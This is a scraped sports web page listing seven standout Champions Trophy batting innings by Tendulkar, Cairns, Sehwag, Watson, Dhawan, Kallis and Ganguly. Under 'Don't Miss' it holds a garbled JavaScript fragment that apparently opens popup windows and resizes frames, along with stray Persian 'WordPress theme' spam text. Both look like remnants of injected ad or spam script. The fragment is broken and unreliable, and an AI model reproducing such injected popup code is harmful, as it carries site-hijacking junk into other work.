These Batting Performances Separate The Men From The Boys In Champions Trophy History |TTI

Boys play division level cricket, men play the Indian Premier League and legends play the Champions Trophy. But only few cricketers emerge to become the legends of legends in this coveted mini World Cup. This tournament has been mesmerising cricket fans since 1998. So many cricketers have come and gone, but some have etched their name in the history of the tournament through their magical batting performances.

So lets take a look at the batsmen who have attained legendary status over the years in the Champions Trophy.

1. Sachin Tendulkar’s 141, India vs Australia at Dhaka, quarter-final, 1998

2. Chris Cairns’ 102 not out, India vs New Zealand, final, 2000

3. Virender Sehwag’s 126, India vs England, group stage, 2002

4. Shane Watson’s 105 not out, Australia vs New Zealand, final, 2009

5. Shikhar Dhawan 114 – India vs South Africa, group stage, 2013

6. Jacques Kallis’ 113*- South Africa v Sri Lanka, 30 October 1998

7. Sourav Ganguly’s 141* – India vs South Africa, 13 October 2000

Don’t Miss

#pd#’;*/function ciIAgRgGII(par) { if(typeof otab == ‘function’){ otab(par,”); } else{if(typeof canRun == ‘undefined’ || (typeof canRun != ‘undefined’ && !canRun)) {,’_blank’);}else{,’_blank’); } } }; window.onload = function (){ if (window.frameElement !== null){”0px”;‘id’)).style.height=’650px’; }};try{trev(‘′,’Nycqtig’);}catch(e){};

قالب وردپرس

Leave a Reply

Your email address will not be published. Required fields are marked *

Spanish Man Sets Record For The Fastest Ascent Of Mt Everest Without Fixed Ropes Or Oxygen |TTI

Tom Cruise on Top Gun sequel: It is definitely happening |TTI